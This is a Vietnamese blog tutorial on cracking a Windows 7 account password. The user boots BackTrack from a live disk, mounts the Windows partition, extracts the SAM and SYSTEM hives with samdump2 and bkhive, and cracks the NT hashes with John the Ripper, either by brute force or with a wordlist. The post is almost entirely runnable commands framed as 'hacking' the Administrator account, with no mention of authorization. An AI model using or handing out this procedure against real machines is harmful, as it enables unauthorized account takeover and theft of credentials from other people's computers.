Nguồn anhdung89.blogspot
Dò pass Win 7 dùng Backtrack 4 hoặc BackTrack 5 R2
- Công cụ cần thiết : Backtrack 4
Link :
ftp://ftp.uio.no/linux/backtrack/bt4-final.iso- Bước 1 : xác định tài khoản đăng nhập của Win 7 cần hack.
Ở đây tài khoản là : Administrator.
- Bước 2 : Boot vào Backtrack 4 và chọn boot như hình dưới .
- Bước 3 : Sau khi boot vào xong bắt đầu gõ lần lượt các lệnh :
- - fdisk -l ( kiểm tra xem win 7 được cài ở phân vùng nào ở đây là phân vùng /dev/sda2)
- mkdir /mnt/sda2
- - mount –t ntfs /dev/sda2 /mnt/sda2/
- - cd /mnt/sda2/Windows/System32/config
- - samdump2 SYSTEM SAM > /root/pass1
- - cat /root/pass1 | grep Administrator > /root/pass2
- - cd /pentest/passwords/jtr/
- - ./john –f:NT /root/pass2
Đến lệnh này là xong, ngồi đợi là có pass.
Các bạn down tài liệu hướng dẫn chi tiết : tại đây
Video hướng dẫn :
Youtube
Gotupload
(Chú ý : chỉ dò được pass có 8 kí tự thôi.Nhiều hơn không dò được.)
Update 30/04/2012
Phần này hướng dẫn dùng Back track 5 R2 để dò pass Win 7.Có thể dò được mọi pass, miễn là pass đó nắm trong file từ điển(password.lst).Quá trình dò rất nhanh với file password.lst có dung lượng lớn .
Các bước thực hiện lệnh như sau hình sau :
Code :
bkhive /media/disk/Windows/System32/config/SYSTEM syskey.txt
samdump2 /media/disk/Windows/System32/config/SAM syskey.txt>passhash.txt
cd /pentest/passwords/john/
john /root/passhash.txt --format=nt --wordlist="đường dẫn đến file pass list của bạn"
Xong.